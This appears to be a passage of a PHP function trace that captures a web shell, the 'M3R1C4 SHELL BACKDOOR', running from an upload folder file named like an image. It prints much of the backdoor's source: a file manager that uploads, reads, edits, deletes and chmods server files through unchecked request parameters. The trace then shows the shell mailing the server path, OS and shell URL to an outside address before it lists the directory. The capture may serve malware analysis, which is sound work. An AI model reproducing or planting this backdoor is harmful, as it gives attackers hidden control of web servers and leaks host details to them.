!!</font><br />\';\r\n}\r\n}\r\necho \'</center><center><form enctype="multipart/form-data" method="POST"><font color="black"><input style="background:silver;font-family: Comic Sans MS " type="file" name="file" />\r\n<input type="submit" value="Upload" />\r\n</form></center>\r\n</td></tr>\';\r\nif(isset($_GET[\'filesrc\'])){\r\necho "<tr><td><center>Current File : ";\r\necho $_GET[\'filesrc\'];\r\necho \'</center></tr></td></table><br />\';\r\necho(\' <textarea style="width: 100%;height: 400px;" readonly> \'.htmlspecialchars(file_get_contents($_GET[\'filesrc\'])).\'</textarea>\');\r\n}\r\n//Empety\r\nelseif(isset($_GET[\'option\']) && $_GET[\'opt\'] != \'delete\'){\r\necho \'</table><br /><center>\'.$_POST[\'path\'].\'<br /><br />\';\r\n//Chmod\r\nif($_GET[\'opt\'] == \'chmod\'){\r\nif(isset($_POST[\'perm\'])){\r\nif(chmod($_POST[\'path\'],$_POST[\'perm\'])){\r\necho \'<font color="green">Change Permission Done </font><br />\';\r\n}else{\r\necho \'<font color="red">Change Permission Error </font><br />\';\r\n}\r\n}\r\n\r\n$hell = $_GET[\'path\'];\r\n$yeah = $_GET[\'name\'];\r\n$patc = "$hell/$yeah";\r\n\r\necho \'<form method="POST">\r\nPermission : <input name="perm" type="text" size="4" value="\'.substr(sprintf(\'%o\', fileperms($patc)), -4).\'" />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="chmod">\r\n<input type="submit" value="Submit" />\r\n</form>\';\r\n}\r\n//\r\nelseif($_GET[\'opt\'] == \'btw\'){\r\n\t$cwd = getcwd();\r\n\t echo \'<form action="?option&path=\'.$cwd.\'&opt=delete&type=buat" method="POST">\r\nNew Name : <input name="name" type="text" size="20" value="Folder" />\r\n<input type="hidden" name="path" value="\'.$cwd.\'">\r\n<input type="hidden" name="opt" value="delete">\r\n<input type="submit" value="Submit" />\r\n</form>\';\r\n}\r\n//Rename file\r\nelseif($_GET[\'opt\'] == \'rename\'){\r\nif(isset($_POST[\'newname\'])){\r\nif(rename($_POST[\'path\'],$path.\'/\'.$_POST[\'newname\'])){\r\necho \'<font color="green">Change Name Done </font><br />\';\r\n}else{\r\necho \'<font color="red">Change Name Error </font><br />\';\r\n}\r\n$_POST[\'name\'] = $_POST[\'newname\'];\r\n}\r\n$hell = $_GET[\'path\'];\r\n$yeah = $_GET[\'name\'];\r\n$patc = "$hell/$yeah";\r\n$new = $_POST[\'newname\'];\r\n\r\necho \'<form method="POST">\r\nNew Name : <input name="newname" type="text" size="20" value="\'.$new.\'" />\r\n<input type="hidden" name="path" value="\'.$patc.\'">\r\n<input type="hidden" name="opt" value="rename">\r\n<input type="submit" value="Submit" />\r\n</form>\';\r\n}\r\n//File baru\r\nelseif($_GET[\'opt\'] == \'baru\'){\r\n\t\r\n$hell = $_GET[\'path\'];\r\n$yeah = $_GET[\'name\'];\r\n$patc = "$hell/$yeah";\r\n$new = $_POST[\'newname\'];\r\n$azz = $_POST[\'path\'];\r\n$newz = "$azz/$new";\r\n\r\n\r\nif(isset($_POST[\'src\'])){\r\n$fp = fopen($_POST[\'path\'],\'w\');\r\nif(fwrite($fp,$_POST[\'src\'])){\r\necho \'<font color="green">Create File Done [ \'.$new.\' ]</font><br />\';\r\n}else{\r\necho \'<font color="red">Create File Error</font><br />\';\r\n}\r\nfclose($fp);\r\n}\r\n\r\necho \'<form method="POST"> Name : <input name="ngaran1" type="text" size="20" value="\'.$new.\'" /><input type="submit" name="ngaran" value="Create"/></form><br> \';\r\n\r\n$ho = $_POST[\'ngaran1\'];\r\n\r\nif(isset($_POST[\'ngaran\'])){\r\necho \'<form method="POST">\r\n<textarea cols=80 rows=20 name="src">\'.htmlspecialchars(file_get_contents($patc)).\'</textarea><br />\r\n<input type="hidden" name="path" value="\'.$hell.\'/\'.$ho.\'">\r\n<input type="hidden" name="opt" value="edit">\r\n<input type="submit" value="Submit" />\r\n</form>\';\r\n\t}\r\n\t}\r\n//Edited file\r\nelseif($_GET[\'opt\'] == \'edit\'){\r\nif(isset($_POST[\'src\'])){\r\n$fp = fopen($_POST[\'path\'],\'w\');\r\nif(fwrite($fp,$_POST[\'src\'])){\r\necho \'<font color="green">Edit File Done </font><br />\';\r\n}else{\r\necho \'<font color="red">Edit File Error </font><br />\';\r\n}\r\nfclose($fp);\r\n}\r\n$hell = $_GET[\'path\'];\r\n$yeah = $_GET[\'name\'];\r\n$patc = "$hell/$yeah";\r\necho \'<form method="POST">\r\n<textarea cols=80 rows=20 name="src">\'.htmlspecialchars(file_get_contents($patc)).\'</textarea><br />\r\n<input type="hidden" name="path" value="\'.$patc.\'">\r\n<input type="hidden" name="opt" value="edit">\r\n<input type="submit" value="Submit" />\r\n</form>\';\r\n}\r\necho \'</center>\';\r\n}else{\r\necho \'</table><br /><center>\';\r\n//Delete dir and file\r\nif(isset($_GET[\'option\']) && $_GET[\'opt\'] == \'delete\'){\r\n\t\r\n$hell = $_GET[\'path\'];\r\n$yeah = $_GET[\'name\'];\r\n$patc = "$hell/$yeah";\r\n\r\n//Delete dir\r\nif($_GET[\'type\'] == \'dir\'){\r\n\r\nif(rmdir($patc)){\r\necho \'<font color="green">Delete File Done</font><br />\';\r\n}else{\r\necho \'<font color="red#">Delete File Error </font><br />\';\r\n}\r\n}\r\n//buat folder\r\nif($_GET[\'type\'] == \'buat\'){\r\n$haaa = $_POST[\'path\'];\r\n$heee = $_POST[\'name\'];\r\n$hooo = "$haaa/$heee";\r\n$new = $haaa.\'/\'.htmlspecialchars($heee);\r\nif(!mkdir($new)){\r\necho \'<font color="red">Create Folder Error</font><br />\';\r\n}else{\r\necho \'<font color="green">Create Folder Done </font><br />\';\r\n}\r\n}\r\n//Delete file\r\nelseif($_GET[\'type\'] == \'file\'){\r\n\r\n$hell = $_GET[\'path\'];\r\n$yeah = $_GET[\'name\'];\r\n$patc = "$hell/$yeah";\r\n\r\nif(unlink($patc)){\r\necho \'<font color="green">Delete File Done</font><br />\';\r\n}else{\r\necho \'<font color="red#">Delete File Error </font><br />\';\r\n}\r\n}\r\n}\r\necho \'</center>\';\r\n$scandir = scandir($path);\r\n$pa = getcwd();\r\necho \' <table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">\r\n<tr>\r\n<th class=th_home style="background:silver;color:black;"><center>Name</center></th>\r\n<th class=th_home style="background:silver;color:black;" ><center>Size</center></th>\r\n<th class=th_home style="background:silver;color:black;" ><center>Permission</center></th>\r\n<th class=th_home style="background:silver;color:black;" ><center>Options</center></th>\r\n</tr> <tr>\r\n<td class=td_home>..</td><td class=td_home align=center>NONE</td> <td class=td_home align=center>LINK</td> <td class=td_home align=center> <a href="?option&path=\'.$pa.\'&opt=baru&name=new.php">New File</a> | <a href="?option&path=\'.$pa.\'&opt=btw&type=dir">New Folder</a> </td></tr>\r\n\';\r\n\r\nforeach($scandir as $dir){\r\nif(!is_dir("$path/$dir") || $dir == \'.\' || $dir == \'..\') continue;\r\necho "\r\n<tr>\r\n<td class=td_home> <img src=\'data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=\'> <a href=\\"?path=$path/$dir\\">$dir</a></td>\r\n<td class=td_home ><center>DIR</center></td>\r\n<td class=td_home ><center>";\r\nif(is_writable("$path/$dir")) echo \'<font color="green">\';\r\nelseif(!is_readable("$path/$dir")) echo \'<font color="red">\';\r\necho perms("$path/$dir");\r\nif(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo \'</font>\';\r\n\r\necho "</center></td>\r\n<td class=td_home ><center>\r\n<a href=\\"?option&path=$path&opt=rename&type=dir&name=$dir\\">Rename</a> <a href=\\"?option&path=$path&opt=delete&type=dir&name=$dir\\">Delete</a> <a href=\\"?option&path=$path&opt=chmod&type=dir&name=$dir\\">Chmod</a>\r\n\r\n</center></td>\r\n</tr>";\r\n}\r\necho \'<br>\';\r\nforeach($scandir as $file){\r\nif(!is_file("$path/$file")) continue;\r\n$size = filesize("$path/$file")/1024;\r\n$size = round($size,3);\r\nif($size >= 1024){\r\n$size = round($size/1024,2).\' MB\';\r\n}else{\r\n$size = $size.\' KB\';\r\n}\r\n\r\necho "<tr>\r\n<td class=td_home > <img src=\'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=\'> <a href=\\"?filesrc=$path/$file&path=$path\\">$file</a></td>\r\n<td class=td_home><center>".$size."</center></td>\r\n<td class=td_home><center>";\r\nif(is_writable("$path/$file")) echo \'<font color="green">\';\r\nelseif(!is_readable("$path/$file")) echo \'<font color="red">\';\r\necho perms("$path/$file");\r\nif(is_writable("$path/$file") || !is_readable("$path/$file")) echo \'</font>\';\r\necho "</center></td>\r\n<td class=td_home><center>\r\n<a href=\\"?option&path=$path&opt=edit&type=file&name=$file\\">Edit</a> <a href=\\"?option&path=$path&opt=rename&type=file&name=$file&path=$path\\">Rename</a> <a href=\\"?option&path=$path&opt=delete&type=file&name=$file\\">Delete</a> <a href=\\"?option&path=$path&opt=chmod&type=file&name=$file\\">Chmod</a>\r\n</center></td>\r\n</tr>";\r\n}\r\necho \'</table>\r\n</div>\';\r\n}\r\necho \'<br><center>Copyright &copy; Trenggalek Cyber Army</b></body>\r\n</html>\';\r\nfunction perms($file){\r\n$perms = fileperms($file);\r\n\r\nif (($perms & 0xC000) == 0xC000) {\r\n// Socket\r\n$info = \'s\';\r\n} elseif (($perms & 0xA000) == 0xA000) {\r\n// Symbolic Link\r\n$info = \'l\';\r\n} elseif (($perms & 0x8000) == 0x8000) {\r\n// Regular\r\n$info = \'-\';\r\n} elseif (($perms & 0x6000) == 0x6000) {\r\n// Block special\r\n$info = \'b\';\r\n} elseif (($perms & 0x4000) == 0x4000) {\r\n// Directory\r\n$info = \'d\';\r\n} elseif (($perms & 0x2000) == 0x2000) {\r\n// Character special\r\n$info = \'c\';\r\n} elseif (($perms & 0x1000) == 0x1000) {\r\n// FIFO pipe\r\n$info = \'p\';\r\n} else {\r\n// Unknown\r\n$info = \'u\';\r\n}\r\n\r\n// Owner\r\n$info .= (($perms & 0x0100) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0080) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0040) ?\r\n(($perms & 0x0800) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0800) ? \'S\' : \'-\'));\r\n\r\n// Group\r\n$info .= (($perms & 0x0020) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0010) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0008) ?\r\n(($perms & 0x0400) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0400) ? \'S\' : \'-\'));\r\n\r\n// World\r\n$info .= (($perms & 0x0004) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0002) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0001) ?\r\n(($perms & 0x0200) ? \'t\' : \'x\' ) :\r\n(($perms & 0x0200) ? \'T\' : \'-\'));\r\n\r\nreturn $info;\r\n}\r\n//M3R1C4 SHELL BACKDOOR V1.0 \r\n//Design By Noval - TCA team\r\n//Greezt : IndoXploit & Ustadcage48\r\n//Keep Calm & Crootz!'	/var/www/html/uploads/img_x.phtml	70	0
3	9	0	0.005812	890592	set_time_limit	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	7	1	0
3	9	1	0.005838	890656
3	9	R			FALSE
3	10	0	0.005853	890624	error_reporting	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	8	1	0
3	10	1	0.005868	890664
3	10	R			22527
3	11	0	0.005882	890624	get_magic_quotes_gpc	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	10	0
3	11	1	0.005897	890624
3	11	R			FALSE
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	23	$kime = 'aqpunk21@gmail.com'
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	24	$baslik = 'Pesanan Shell datang Cuk !'
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	25	$spyhackerz = 'Dosya Yolu : /var/www/html\r\n'
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	26	$spyhackerz .= 'Server Admin : webmaster@localhost\r\n'
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	27	$spyhackerz .= 'Server isletim sistemi : Apache/2.4.52 (Ubuntu)\r\n'
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	28	$spyhackerz .= 'Shell Link : http://localhost/uploads/img_x.phtml\r\n'
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	29	$spyhackerz .= 'Avlanan Site : localhost\r\n'
3	12	0	0.006015	890848	mail	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	30	3	'aqpunk21@gmail.com'	'Pesanan Shell datang Cuk !'	'Dosya Yolu : /var/www/html\r\nServer Admin : webmaster@localhost\r\nServer isletim sistemi : Apache/2.4.52 (Ubuntu)\r\nShell Link : http://localhost/uploads/img_x.phtml\r\nAvlanan Site : localhost\r\n'
3	12	1	0.006733	890944
3	12	R			FALSE
3	13	0	0.006757	890848	php_uname	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	73	0
3	13	1	0.006774	890960
3	13	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
3	14	0	0.006796	890848	getcwd	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	78	0
3	14	1	0.006811	890896
3	14	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	78	$path = '/var/www/html/uploads'
3	15	0	0.006841	890896	str_replace	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	80	3	'\\'	'/'	'/var/www/html/uploads'
3	15	1	0.006858	890992
3	15	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	80	$path = '/var/www/html/uploads'
3	16	0	0.006886	890896	explode	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	81	2	'/'	'/var/www/html/uploads'
3	16	1	0.006902	891472
3	16	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	81	$paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	83	$id = 0
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	85	$a = TRUE
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	83	$id = 1
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	91	$i = 0
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	91	$i++
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	91	$i++
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	83	$id = 2
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	91	$i = 0
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	91	$i++
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	91	$i++
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	91	$i++
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	83	$id = 3
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	91	$i = 0
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	91	$i++
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	91	$i++
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	91	$i++
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	91	$i++
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	83	$id = 4
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	91	$i = 0
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	91	$i++
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	91	$i++
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	91	$i++
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	91	$i++
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	91	$i++
3	17	0	0.007331	891400	scandir	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1432	1	'/var/www/html/uploads'
3	17	1	0.007374	892024
3	17	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'img_x.phtml', 5 => 'prepend.php']
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1432	$scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'img_x.phtml', 5 => 'prepend.php']
3	18	0	0.007499	891992	getcwd	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1433	0
3	18	1	0.007514	892040
3	18	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1433	$pa = '/var/www/html/uploads'
3	19	0	0.007543	892088	is_dir	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1445	1	'/var/www/html/uploads/.'
3	19	1	0.007562	892152
3	19	R			TRUE
3	20	0	0.007576	892120	is_dir	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1445	1	'/var/www/html/uploads/..'
3	20	1	0.007593	892168
3	20	R			TRUE
3	21	0	0.007607	892128	is_dir	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1445	1	'/var/www/html/uploads/.htaccess'
3	21	1	0.007624	892168
3	21	R			FALSE
3	22	0	0.007639	892128	is_dir	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1445	1	'/var/www/html/uploads/data'
3	22	1	0.007655	892168
3	22	R			TRUE
3	23	0	0.007670	892128	is_writable	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1451	1	'/var/www/html/uploads/data'
3	23	1	0.007688	892168
3	23	R			TRUE
3	24	0	0.007702	892128	perms	1		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1453	1	'/var/www/html/uploads/data'
4	25	0	0.007717	892128	fileperms	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1494	1	'/var/www/html/uploads/data'
4	25	1	0.007731	892168
4	25	R			16895
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1494	$perms = 16895
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1510	$info = 'd'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1523	$info .= 'r'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1524	$info .= 'w'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1527	$info .= 'x'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1530	$info .= 'r'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1531	$info .= 'w'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1534	$info .= 'x'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1537	$info .= 'r'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1538	$info .= 'w'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1541	$info .= 'x'
3	24	1	0.007868	892168
3	24	R			'drwxrwxrwx'
3	26	0	0.007882	892128	is_writable	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1454	1	'/var/www/html/uploads/data'
3	26	1	0.007899	892168
3	26	R			TRUE
3	27	0	0.007914	892136	is_dir	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1445	1	'/var/www/html/uploads/img_x.phtml'
3	27	1	0.007973	892184
3	27	R			FALSE
3	28	0	0.007989	892144	is_dir	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1445	1	'/var/www/html/uploads/prepend.php'
3	28	1	0.008006	892184
3	28	R			FALSE
3	29	0	0.008021	892128	is_file	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1465	1	'/var/www/html/uploads/.'
3	29	1	0.008037	892152
3	29	R			FALSE
3	30	0	0.008050	892120	is_file	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1465	1	'/var/www/html/uploads/..'
3	30	1	0.008066	892168
3	30	R			FALSE
3	31	0	0.008079	892128	is_file	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1465	1	'/var/www/html/uploads/.htaccess'
3	31	1	0.008095	892168
3	31	R			TRUE
3	32	0	0.008108	892128	filesize	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1466	1	'/var/www/html/uploads/.htaccess'
3	32	1	0.008123	892168
3	32	R			64
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1466	$size = 0.0625
3	33	0	0.008148	892072	round	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1467	2	0.0625	3
3	33	1	0.008164	892144
3	33	R			0.063
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1467	$size = 0.063
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1471	$size = '0.063 KB'
3	34	0	0.008203	892168	is_writable	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1478	1	'/var/www/html/uploads/.htaccess'
3	34	1	0.008221	892208
3	34	R			FALSE
3	35	0	0.008234	892168	is_readable	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1479	1	'/var/www/html/uploads/.htaccess'
3	35	1	0.008255	892208
3	35	R			TRUE
3	36	0	0.008268	892168	perms	1		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1480	1	'/var/www/html/uploads/.htaccess'
4	37	0	0.008283	892168	fileperms	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1494	1	'/var/www/html/uploads/.htaccess'
4	37	1	0.008296	892208
4	37	R			33188
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1494	$perms = 33188
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1504	$info = '-'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1523	$info .= 'r'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1524	$info .= 'w'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1527	$info .= '-'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1530	$info .= 'r'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1531	$info .= '-'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1534	$info .= '-'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1537	$info .= 'r'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1538	$info .= '-'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1541	$info .= '-'
3	36	1	0.008428	892208
3	36	R			'-rw-r--r--'
3	38	0	0.008454	892168	is_writable	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1481	1	'/var/www/html/uploads/.htaccess'
3	38	1	0.008472	892208
3	38	R			FALSE
3	39	0	0.008485	892168	is_readable	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1481	1	'/var/www/html/uploads/.htaccess'
3	39	1	0.008501	892208
3	39	R			TRUE
3	40	0	0.008515	892168	is_file	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1465	1	'/var/www/html/uploads/data'
3	40	1	0.008532	892208
3	40	R			FALSE
3	41	0	0.008545	892176	is_file	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1465	1	'/var/www/html/uploads/img_x.phtml'
3	41	1	0.008561	892224
3	41	R			TRUE
3	42	0	0.008574	892184	filesize	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1466	1	'/var/www/html/uploads/img_x.phtml'
3	42	1	0.008587	892224
3	42	R			25240
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1466	$size = 24.6484375
3	43	0	0.008613	892080	round	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1467	2	24.6484375	3
3	43	1	0.008627	892152
3	43	R			24.648
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1467	$size = 24.648
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1471	$size = '24.648 KB'
3	44	0	0.008668	892184	is_writable	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1478	1	'/var/www/html/uploads/img_x.phtml'
3	44	1	0.008685	892224
3	44	R			FALSE
3	45	0	0.008698	892184	is_readable	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1479	1	'/var/www/html/uploads/img_x.phtml'
3	45	1	0.008714	892224
3	45	R			TRUE
3	46	0	0.008727	892184	perms	1		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1480	1	'/var/www/html/uploads/img_x.phtml'
4	47	0	0.008740	892184	fileperms	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1494	1	'/var/www/html/uploads/img_x.phtml'
4	47	1	0.008754	892224
4	47	R			33204
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1494	$perms = 33204
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1504	$info = '-'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1523	$info .= 'r'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1524	$info .= 'w'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1527	$info .= '-'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1530	$info .= 'r'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1531	$info .= 'w'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1534	$info .= '-'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1537	$info .= 'r'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1538	$info .= '-'
3		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1541	$info .= '-'
3	46	1	0.008885	892224
3	46	R			'-rw-rw-r--'
3	48	0	0.008899	892184	is_writable	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1481	1	'/var/www/html/uploads/img_x.phtml'
3	48	1	0.008921	892224
3	48	R			FALSE
3	49	0	0.008935	892184	is_readable	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1481	1	'/var/www/html/uploads/img_x.phtml'
3	49	1	0.008951	892224
3	49	R			TRUE
3	50	0	0.008965	892184	is_file	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1465	1	'/var/www/html/uploads/prepend.php'
3	50	1	0.008981	892224
3	50	R			TRUE
3	51	0	0.008994	892184	filesize	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1466	1	'/var/www/html/uploads/prepend.php'
3	51	1	0.009009	892224
3	51	R			57
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1466	$size = 0.0556640625
3	52	0	0.009052	892080	round	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1467	2	0.0556640625	3
3	52	1	0.009067	892152
3	52	R			0.056
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1467	$size = 0.056
2		A						/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1471	$size = '0.056 KB'
3	53	0	0.009108	892184	is_writable	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1478	1	'/var/www/html/uploads/prepend.php'
3	53	1	0.009125	892224
3	53	R			FALSE
3	54	0	0.009138	892184	is_readable	0		/var/www/html/uploads/img_x.phtml(70) : eval()'d code	1479	1	'/var/www/html/uploads/prepend.php'
3	54	1	0.009154	892224
3	54	R			TRUE
